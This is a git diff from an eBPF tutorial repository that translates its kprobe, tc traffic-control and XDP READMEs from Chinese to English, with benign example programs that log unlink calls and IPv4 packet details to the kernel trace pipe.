It allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. - -## Background of kprobes Technology - -During the debugging process of the kernel or modules, developers often need to know whether certain functions are called, when they are called, whether the execution is correct, and what the input and return values of the functions are. A simple approach is to add log print information to the corresponding functions in the kernel code. However, this approach often requires recompiling the kernel or modules, restarting the device, etc., which is complex and may disrupt the original code execution process. - -By using the kprobes technology, users can define their own callback functions and dynamically insert probes into almost all functions in the kernel or modules (some functions cannot be probed, such as the kprobes' own implementation functions, which will be explained in detail later). When the kernel execution flow reaches the specified probe function, it will invoke the callback function, allowing the user to collect the desired information. The kernel will then return to the normal execution flow. If the user has collected sufficient information and no longer needs to continue probing, the probes can be dynamically removed. Therefore, the kprobes technology has the advantages of minimal impact on the kernel execution flow and easy operation. - -The kprobes technology includes three detection methods: kprobe, jprobe, and kretprobe. First, kprobe is the most basic detection method and serves as the basis for the other two. It allows probes to be placed at any position (including within a function). It provides three callback modes for probes: `pre_handler`, `post_handler`, and `fault_handler`. The `pre_handler` function is called before the probed instruction is executed, the `post_handler` is called after the probed instruction is completed (note that it is not the probed function), and the `fault_handler` is called when a memory access error occurs. The jprobe is based on kprobe and is used to obtain the input values of the probed function. Finally, as the name suggests, kretprobe is also based on kprobe and is used to obtain the return values of the probed function. - -The kprobes technology is not only implemented through software but also requires support from the hardware architecture. This involves CPU exception handling and single-step debugging techniques. The former is used to make the program's execution flow enter the user-registered callback function, and the latter is used to single-step execute the probed instruction. Therefore, not all architectures support kprobes. Currently, kprobes technology supports various architectures, including i386, x86_64, ppc64, ia64, sparc64, arm, ppc, and mips (note that some architecture implementations may not be complete, see the kernel's Documentation/kprobes.txt for details). - -Features and Usage Restrictions of kprobes: - -1. kprobes allows multiple kprobes to be registered at the same probe position, but jprobe currently does not support this. It is also not allowed to use other jprobe callback functions or the `post_handler` callback function of kprobe as probe points. -2. 
In general, any function in the kernel can be probed, including interrupt handlers. However, the functions used to implement kprobes themselves in kernel/kprobes.c and arch/*/kernel/kprobes.c are not allowed to be probed. Additionally, `do_page_fault` and `notifier_call_chain` are also not allowed.
-3. If an inline function is used as a probe point, kprobes may not be able to guarantee that probe points are registered for all instances of that function. Since gcc may automatically optimize certain functions as inline functions, the desired probing effect may not be achieved.
-4. The callback function of a probe point may modify the runtime context of the probed function, for example by modifying kernel data structures or by altering the pre-probe register state saved in the `struct pt_regs` structure. Therefore, kprobes can be used to install bug fixes or inject fault testing code.
-5. kprobes avoids recursively invoking probe callbacks: for example, if a probe point is registered on the `printk()` function and its callback calls `printk()` again, the callback for the `printk` probe point will not be triggered a second time; only the `nmissed` field in the `kprobe` structure will be incremented.
-6. mutex locks and dynamic memory allocation are not used in the registration and removal process of kprobes.
-
-7. During the execution of kprobes callback functions, kernel preemption is disabled, and they may also be executed with interrupts disabled, depending on the CPU architecture. Therefore, in no circumstances should the callback call functions that give up the CPU (such as semaphores or mutex locks);
-8. kretprobe is implemented by replacing the return address with the pre-defined trampoline address, so stack backtraces and the gcc built-in function `__builtin_return_address()` will return the address of the trampoline instead of the actual return address of the probed function;
-9. If a function's call count and return count are unequal, registering a kretprobe on such a function may not achieve the expected effect; for example, `do_exit()` is problematic, while `do_execve()` and `do_fork()` are not;
-10. When entering and exiting a function, if the CPU is running on a stack that does not belong to the current task, registering a kretprobe on that function may have unpredictable consequences. Therefore, kprobes does not support registering a kretprobe for the `__switch_to()` function on the x86_64 architecture and will directly return `-EINVAL`.
-
-## kprobe Example
-
-The complete code is as follows:
-
-```c
-#include "vmlinux.h"
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-#include <bpf/bpf_core_read.h>
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
-
-SEC("kprobe/do_unlinkat")
-int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
-{
-    pid_t pid;
-    const char *filename;
-
-    pid = bpf_get_current_pid_tgid() >> 32;
-    filename = BPF_CORE_READ(name, name);
-    bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
-    return 0;
-}
-
-SEC("kretprobe/do_unlinkat")
-int BPF_KRETPROBE(do_unlinkat_exit, long ret)
-{
-    pid_t pid;
-
-    pid = bpf_get_current_pid_tgid() >> 32;
-    bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
-    return 0;
-}
-```
-
-This code is a simple eBPF program used to monitor and capture the unlink system call executed in the Linux kernel. The unlink system call is used to delete a file. This eBPF program traces this system call by placing hooks at the entry and exit points of the `do_unlinkat` function using a kprobe (kernel probe).
-
-First, we import the necessary header files: vmlinux.h, bpf_helpers.h, bpf_tracing.h, and bpf_core_read.h. Then, we define a license to allow the program to run in the kernel.
-
-```c
-#include "vmlinux.h"
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-#include <bpf/bpf_core_read.h>
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
-```
-
-Next, we define a kprobe named `BPF_KPROBE(do_unlinkat)` which gets triggered when the `do_unlinkat` function is entered. It takes two parameters: `dfd` (file descriptor) and `name` (filename structure pointer). In this kprobe, we retrieve the PID (process identifier) of the current process and then read the filename. Finally, we use the `bpf_printk` function to print the PID and filename in the kernel log.
-
-```c
-SEC("kprobe/do_unlinkat")
-int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
-{
-    pid_t pid;
-    const char *filename;
-
-    pid = bpf_get_current_pid_tgid() >> 32;
-    filename = BPF_CORE_READ(name, name);
-    bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
-    return 0;
-}
-```
-
-Next, we define a kretprobe named `BPF_KRETPROBE(do_unlinkat_exit)` that will be triggered when exiting the `do_unlinkat` function. The purpose of this kretprobe is to capture the return value (`ret`) of the function. We again obtain the PID of the current process and use the `bpf_printk` function to print the PID and return value in the kernel log.
-
-```c
-SEC("kretprobe/do_unlinkat")
-int BPF_KRETPROBE(do_unlinkat_exit, long ret)
-{
-    pid_t pid;
-
-    pid = bpf_get_current_pid_tgid() >> 32;
-    bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
-    return 0;
-}
-```
-
-eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that integrates with Wasm. Its goal is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to <https://github.com/eunomia-bpf/eunomia-bpf> to download and install the ecc compiler toolchain and ecli runtime.
-
-To compile this program, use the ecc tool:
-
-```console
-$ ecc kprobe-link.bpf.c
-Compiling bpf object...
-Packing ebpf object and config into package.json...
-```
-
-Then run:
-
-```console
-sudo ecli run package.json
-```
-
-In another window:
-
-```shell
-touch test1
-rm test1
-touch test2
-rm test2
-```
-
-You should see kprobe demo output similar to the following in the /sys/kernel/debug/tracing/trace_pipe file:
-
-```shell
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
-    rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1
-    rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: ret = 0
-    rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2
-    rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0
-```
-
-## Summary
-
-In this article's example, we learned how to use eBPF's kprobe and kretprobe to capture the unlink system call. For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf at <https://eunomia.dev>.
-
-This article is the second part of the introductory eBPF development tutorial. The next article will explain how to use fentry to monitor and capture the unlink system call in eBPF.
-
-If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at <https://github.com/eunomia-bpf/bpf-developer-tutorial> or website <https://eunomia.dev> for more examples and complete tutorials.
diff --git a/src/20-tc/README.md b/src/20-tc/README.md
index 22d01ba..61afea2 100644
--- a/src/20-tc/README.md
+++ b/src/20-tc/README.md
@@ -1,18 +1,18 @@
-# eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制
+# eBPF Tutorial by Example 20: tc Traffic Control

-## 背景
+## Background

-Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。
+Linux's Traffic Control (tc) subsystem has been present in the kernel for many years. Similar to the relationship between iptables and netfilter, tc includes a user-space tc program and a kernel-level traffic control framework. It is mainly used to control the sending and receiving of packets in terms of rate, sequence, and other aspects. Starting from Linux 4.1, tc has added some new attachment points and supports loading eBPF programs as filters onto these attachment points.

-## tc 概述
+## Overview of tc

-从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。
+From the protocol stack perspective, tc sits at the link layer: by the time a packet reaches tc, its sk_buff has already been allocated, so tc runs later in the datapath than XDP. In order to control the sending and receiving of packets, tc uses a queue structure to temporarily store and organize packets. In the tc subsystem, the corresponding data structure and algorithmic control mechanism are abstracted as a qdisc (Queueing discipline), which exposes two callback interfaces for enqueuing and dequeuing packets and internally hides the implementation of the queuing algorithm. Within a qdisc, we can build complex tree structures based on filters and classes: filters are attached to a qdisc or class to implement the concrete filtering logic, and their return value determines whether the packet belongs to a specific class.

-当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。
+When a packet reaches the top-level qdisc, its enqueue interface is called, and the mounted filters are executed one by one until a filter matches successfully. The packet is then sent to the class pointed to by that filter and enters the processing flow of the qdisc configured for that class. The tc framework provides the so-called classifier-action mechanism: when a packet matches a specific filter, the action attached to that filter is executed to process the packet, implementing a complete packet classification and processing mechanism.

-现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 `TC_ACT_OK` 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。
+The existing tc provides eBPF with the direct-action mode, which allows an eBPF program loaded as a filter to return values such as `TC_ACT_OK` as tc actions, instead of just returning a classid like traditional filters and handing over the packet processing to the action module. Now, eBPF programs can be mounted on specific qdiscs to perform packet classification and processing actions.
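To make the direct-action attachment concrete: the sketch below is an illustration based on libbpf's TC hook API rather than part of this tutorial's code (which loads the program via the eunomia-bpf annotations shown in the next section). It assumes `prog_fd` is the file descriptor of an already-loaded `SEC("tc")` program and attaches it as a direct-action filter on the ingress hook of interface index 1 (usually loopback):

```c
// Illustrative sketch only, not part of the tutorial sources.
#include <bpf/libbpf.h>

int attach_tc_ingress(int prog_fd)
{
    // Mirrors the @tchook annotation: ifindex 1, ingress side.
    DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook,
                        .ifindex = 1,
                        .attach_point = BPF_TC_INGRESS);
    // Mirrors the @tcopts annotation: handle 1, priority 1.
    DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts,
                        .handle = 1,
                        .priority = 1,
                        .prog_fd = prog_fd);
    int err;

    // Creates the clsact qdisc that hosts the ingress/egress hooks;
    // -EEXIST just means it is already present, which is fine.
    err = bpf_tc_hook_create(&hook);
    if (err && err != -EEXIST)
        return err;

    // Attach the program as a classifier in direct-action mode.
    return bpf_tc_attach(&hook, &opts);
}
```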
-## 编写 eBPF 程序
+## Writing eBPF Programs

```c
#include <vmlinux.h>
@@ -51,28 +51,28 @@ int tc_ingress(struct __sk_buff *ctx)
 char __license[] SEC("license") = "GPL";
 ```

-这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Transmission Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。
+This code defines an eBPF program that can capture and process packets through Linux TC (Traffic Control). In this program, we limit it to capture only IPv4 protocol packets, and then print out the total length and Time-To-Live (TTL) value of the packet using the bpf_printk function.

-需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释:
+Note that we use some BPF library functions in the code, such as bpf_htons and bpf_ntohs, which convert between network byte order and host byte order. In addition, we use some comments to provide attachment-point and option information for TC. For example, at the beginning of this code, we use the following comments:

```c
/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
/// @tcopts {"handle":1, "priority":1}
```

-这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) 中的介绍。
+These comments tell TC to attach the eBPF program to the ingress attachment point of the network interface, and specify the values of the handle and priority options. You can refer to the introduction in [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) for tc-related APIs in libbpf.

-总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。
+In summary, this code implements a simple eBPF program that captures packets and prints out their information.

-## 编译运行
+## Compilation and Execution

-通过容器编译:
+Compile using a container:

```console
docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
```

-或是通过 `ecc` 编译:
+Or compile using `ecc`:

```console
$ ecc tc.bpf.c
@@ -80,13 +80,13 @@ Compiling bpf object...
 Packing ebpf object and config into package.json...
 ```

-并通过 `ecli` 运行:
+And run using `ecli`:

```shell
sudo ecli run ./package.json
```

-可以通过如下方式查看程序的输出:
+You can view the output of the program in the following way:

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe
@@ -96,13 +96,15 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe
 node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64
 ```

-## 总结
+## Summary

-本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。
+This article introduces how to mount eBPF-type filters to the TC traffic control subsystem to process link-layer packets through its queuing machinery. Based on the solution provided by eunomia-bpf to pass parameters to libbpf through comments, we can mount our own tc BPF program to the target network device with specified options and use the kernel's sk_buff structure to filter and process packets.

-如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository at <https://github.com/eunomia-bpf/bpf-developer-tutorial> or website <https://eunomia.dev> for more examples and complete tutorials.
-## 参考 +## References + + + +> The original link of this article: diff --git a/src/20-tc/README.zh.md b/src/20-tc/README.zh.md new file mode 100644 index 0000000..22d01ba --- /dev/null +++ b/src/20-tc/README.zh.md @@ -0,0 +1,108 @@ +# eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 + +## 背景 + +Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。 + +## tc 概述 + +从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。 + +当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。 + +现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 `TC_ACT_OK` 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。 + +## 编写 eBPF 程序 + +```c +#include +#include +#include +#include + +#define TC_ACT_OK 0 +#define ETH_P_IP 0x0800 /* Internet Protocol packet */ + +/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} +/// @tcopts {"handle":1, "priority":1} +SEC("tc") +int tc_ingress(struct __sk_buff *ctx) +{ + void *data_end = (void *)(__u64)ctx->data_end; + void *data = (void *)(__u64)ctx->data; + struct ethhdr *l2; + struct iphdr *l3; + + if (ctx->protocol != bpf_htons(ETH_P_IP)) + return TC_ACT_OK; + + l2 = data; + if ((void *)(l2 + 1) > data_end) + return TC_ACT_OK; + + l3 = (struct iphdr *)(l2 + 1); + if ((void *)(l3 + 1) > data_end) + return TC_ACT_OK; + + bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl); + return TC_ACT_OK; +} + +char __license[] SEC("license") = "GPL"; +``` + +这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Transmission Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。 + +需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释: + +```c +/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} +/// @tcopts {"handle":1, "priority":1} +``` + +这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) 中的介绍。 + +总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc tc.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... 
+``` + +并通过 `ecli` 运行: + +```shell +sudo ecli run ./package.json +``` + +可以通过如下方式查看程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64 + sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64 + sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64 + node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64 +``` + +## 总结 + +本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + ++ ++ diff --git a/src/20-tc/README_en.md b/src/20-tc/README_en.md deleted file mode 100644 index 61afea2..0000000 --- a/src/20-tc/README_en.md +++ /dev/null @@ -1,110 +0,0 @@ -# eBPF Tutorial by Example 20: tc Traffic Control - -## Background - -Linux's Traffic Control (tc) subsystem has been present in the kernel for many years. Similar to the relationship between iptables and netfilter, tc includes a user-space tc program and a kernel-level traffic control framework. It is mainly used to control the sending and receiving of packets in terms of rate, sequence, and other aspects. Starting from Linux 4.1, tc has added some new attachment points and supports loading eBPF programs as filters onto these attachment points. - -## Overview of tc - -From the protocol stack perspective, tc is located at the link layer. Its position has already completed the allocation of sk_buff and is later than xdp. In order to control the sending and receiving of packets, tc uses a queue structure to temporarily store and organize packets. In the tc subsystem, the corresponding data structure and algorithm control mechanism are abstracted as qdisc (Queueing discipline). It exposes two callback interfaces for enqueuing and dequeuing packets externally, and internally hides the implementation of queuing algorithms. In qdisc, we can implement complex tree structures based on filters and classes. Filters are mounted on qdisc or class to implement specific filtering logic, and the return value determines whether the packet belongs to a specific class. - -When a packet reaches the top-level qdisc, its enqueue interface is called, and the mounted filters are executed one by one until a filter matches successfully. Then the packet is sent to the class pointed to by that filter and enters the qdisc processing process configured by that class. The tc framework provides the so-called classifier-action mechanism, that is, when a packet matches a specific filter, the action mounted by that filter is executed to process the packet, implementing a complete packet classification and processing mechanism. - -The existing tc provides eBPF with the direct-action mode, which allows an eBPF program loaded as a filter to return values such as `TC_ACT_OK` as tc actions, instead of just returning a classid like traditional filters and handing over the packet processing to the action module. Now, eBPF programs can be mounted on specific qdiscs to perform packet classification and processing actions. 
-
-## Writing eBPF Programs
-
-```c
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_endian.h>
-#include <bpf/bpf_tracing.h>
-
-#define TC_ACT_OK 0
-#define ETH_P_IP 0x0800 /* Internet Protocol packet */
-
-/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
-/// @tcopts {"handle":1, "priority":1}
-SEC("tc")
-int tc_ingress(struct __sk_buff *ctx)
-{
-    void *data_end = (void *)(__u64)ctx->data_end;
-    void *data = (void *)(__u64)ctx->data;
-    struct ethhdr *l2;
-    struct iphdr *l3;
-
-    if (ctx->protocol != bpf_htons(ETH_P_IP))
-        return TC_ACT_OK;
-
-    l2 = data;
-    if ((void *)(l2 + 1) > data_end)
-        return TC_ACT_OK;
-
-    l3 = (struct iphdr *)(l2 + 1);
-    if ((void *)(l3 + 1) > data_end)
-        return TC_ACT_OK;
-
-    bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl);
-    return TC_ACT_OK;
-}
-
-char __license[] SEC("license") = "GPL";
-```
-
-This code defines an eBPF program that can capture and process packets through Linux TC (Traffic Control). In this program, we limit it to capture only IPv4 protocol packets, and then print out the total length and Time-To-Live (TTL) value of the packet using the bpf_printk function.
-
-Note that we use some BPF library functions in the code, such as bpf_htons and bpf_ntohs, which convert between network byte order and host byte order. In addition, we use some comments to provide attachment-point and option information for TC. For example, at the beginning of this code, we use the following comments:
-
-```c
-/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
-/// @tcopts {"handle":1, "priority":1}
-```
-
-These comments tell TC to attach the eBPF program to the ingress attachment point of the network interface, and specify the values of the handle and priority options. You can refer to the introduction in [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) for tc-related APIs in libbpf.
-
-In summary, this code implements a simple eBPF program that captures packets and prints out their information.
-
-## Compilation and Execution
-
-Compile using a container:
-
-```console
-docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
-```
-
-Or compile using `ecc`:
-
-```console
-$ ecc tc.bpf.c
-Compiling bpf object...
-Packing ebpf object and config into package.json...
-```
-
-And run using `ecli`:
-
-```shell
-sudo ecli run ./package.json
-```
-
-You can view the output of the program in the following way:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
-    node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64
-    sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64
-    sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64
-    node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64
-```
-
-## Summary
-
-This article introduces how to mount eBPF-type filters to the TC traffic control subsystem to process link-layer packets through its queuing machinery. Based on the solution provided by eunomia-bpf to pass parameters to libbpf through comments, we can mount our own tc BPF program to the target network device with specified options and use the kernel's sk_buff structure to filter and process packets.
-
-If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository at <https://github.com/eunomia-bpf/bpf-developer-tutorial> or website <https://eunomia.dev> for more examples and complete tutorials.
diff --git a/src/21-xdp/README.md b/src/21-xdp/README.md
index d6269fa..ef6928c 100644
--- a/src/21-xdp/README.md
+++ b/src/21-xdp/README.md
@@ -1,78 +1,80 @@
-# eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理
+# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP

-在本教程中,我们将介绍 XDP(eXpress Data Path),并通过一个简单的例子帮助你入门。之后,我们将探讨更高级的 XDP 应用,例如负载均衡器、防火墙及其他实际应用。如果你对 eBPF 或 XDP 感兴趣,请在 [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) 上为我们点赞!
+In this tutorial, we will introduce XDP (eXpress Data Path) and walk through a small example to help you get started. Later on, we will explore more advanced XDP applications, such as load balancers, firewalls, and other real-world use cases. Please give us a star on [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) if you are interested in eBPF or XDP!

-## 什么是 XDP?
+## What is XDP?

-XDP 是 Linux 内核中的一种高性能可编程数据路径,专为网络接口级的数据包处理而设计。通过将 eBPF 程序直接附加到网络设备驱动程序上,XDP 能够在数据包到达内核网络栈之前拦截并处理它们。这使得 XDP 能够进行极低延迟和高效的数据包处理,非常适合如 DDoS 防护、负载均衡和流量过滤等任务。实际上,XDP 每核心的吞吐量可以高达 **每秒 2400 万包(Mpps)**。
+XDP is a high-performance, programmable data path in the Linux kernel, designed for packet processing at the network interface level. By attaching eBPF programs directly to network device drivers, XDP can intercept and handle packets before they reach the kernel’s networking stack. This allows for extremely low-latency and efficient packet processing, making it ideal for tasks like DDoS defense, load balancing, and traffic filtering. In fact, XDP can achieve throughput as high as **24 million packets per second (Mpps) per core**.

-### 为什么选择 XDP?
+### Why XDP?

-XDP 运行在比传统 Linux 网络组件(如 cBPF)更低的层级,在网络设备驱动程序的软中断上下文中执行。它能够在数据包被内核标准网络栈处理之前对其进行处理,避免了创建 Linux 中表示网络数据包的 `skb_buff` 结构。这种早期处理为简单但频繁的操作(如丢弃恶意数据包或负载均衡服务器)带来了显著的性能提升。
+XDP operates at a lower level than traditional Linux networking components, like cBPF (Classic BPF), by running inside the soft interrupt context of the network device driver. It can handle packets before they are even processed by the kernel's standard networking stack, bypassing the creation of the `sk_buff` structure, which represents network packets in Linux. This early-stage processing provides significant performance gains for simple but frequent operations like dropping malicious packets or load balancing across servers.

-与其他数据包处理机制相比,XDP 在性能和可用性之间取得了平衡,它利用了 Linux 内核的安全性和可靠性,同时通过可编程的 eBPF 提供了灵活性。
+Compared to other packet processing mechanisms, XDP strikes a balance between performance and usability, leveraging the security and reliability of the Linux kernel while providing flexibility through programmable eBPF.

-## XDP 与其他方法的比较
+## Overview of XDP vs. Other Approaches

-在 XDP 出现之前,一些解决方案通过完全绕过内核来加速数据包处理。其中一个显著的例子是 **DPDK**(数据平面开发工具包)。DPDK 允许用户空间应用程序直接控制网络设备,从而实现非常高的性能。然而,这种方法也存在一些权衡:
+Before XDP, several other solutions aimed to accelerate packet processing by bypassing the kernel entirely. One prominent example is **DPDK** (Data Plane Development Kit). DPDK allows user-space applications to take direct control of network devices, achieving very high performance. However, this approach comes with trade-offs:

-1. **缺乏内核集成**:DPDK 及其他内核绕过解决方案无法利用现有的内核网络功能,开发者必须在用户空间重新实现许多协议和功能。
+1. **Lack of Kernel Integration**: DPDK and other kernel-bypass solutions cannot utilize existing kernel networking features, requiring developers to reimplement many protocols and functions in user space.

-2. **安全边界**:这些绕过技术破坏了内核的安全模型,使得难以利用内核提供的安全工具。
-3.
